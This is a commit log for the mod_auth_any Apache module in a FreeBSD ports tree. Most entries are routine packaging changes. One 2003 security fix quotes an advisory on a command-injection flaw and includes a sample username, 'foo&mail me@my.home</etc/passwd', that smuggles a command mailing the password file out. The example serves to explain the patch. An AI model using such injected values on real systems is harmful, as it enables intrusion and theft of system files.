FreeBSD-ports - Raptor Engineering's fork of pfsense FreeBSD ports tree with pfSense changes

	Commit message (Collapse)	Author	Age	Files	Lines
*	o Fix vulnerability that allows execution of arbitrary commands on	lioux	2003-03-25	3	-0/+87
\| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \|	the server with the uid of the apache process. Background [1]: "The module accepts a username and password from the web client, passes them to a user-space executable (using popen(3), which invokes a shell) and waits for a response in order to authenticate the user. The password is quoted on the popen() command line to avoid interpretation of shell special chars, but the username is not. Thus a malicious user can execute commands by supplying an appropriately crafted username. (e.g. "foo&mail me@my.home</etc/passwd") "The problem is easily fixed by adding quotes (and escaping any quotes already present) to the username and password in the popen command line." o Fix this by adding a escaping function from [2]. Then, modifying this function appropriately with ideas from [3]. Apply the new escaping code to mod_auth_any. o Bump PORTREVISION Submitted by: Security Officer (nectar), Red Hat Security Response Team <security@redhat.com> [1] Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3]
*	De-pkg-comment.	knu	2003-02-20	2	-1/+1
\|
*	o Rollback PORTCOMMENT modifications while this feature's implementation	lioux	2002-11-10	2	-2/+1
\| \| \| \| \| \| \| \|	is better studied o Turn PORTCOMMENT variable in Makefile back into pkg-comment files Approved by: kris (portmgr hat), portmgr, re (silence)
*	Use PORTCOMMENT in the Makefile, and whack the pkg-comment.	adamw	2002-11-06	2	-1/+2
\| \| \| \|	Approved by: pat
*	support appache13-modssl by defining APACHE_PORT in /etc/make.conf	dinoex	2002-09-09	1	-2/+3
\| \| \| \|	others variants of the apache ports can be used too.
*	Add mod_auth_any 1.0.2, an apache module to use any command line	will	2001-04-10	5	-0/+38
	program to authenticate a user.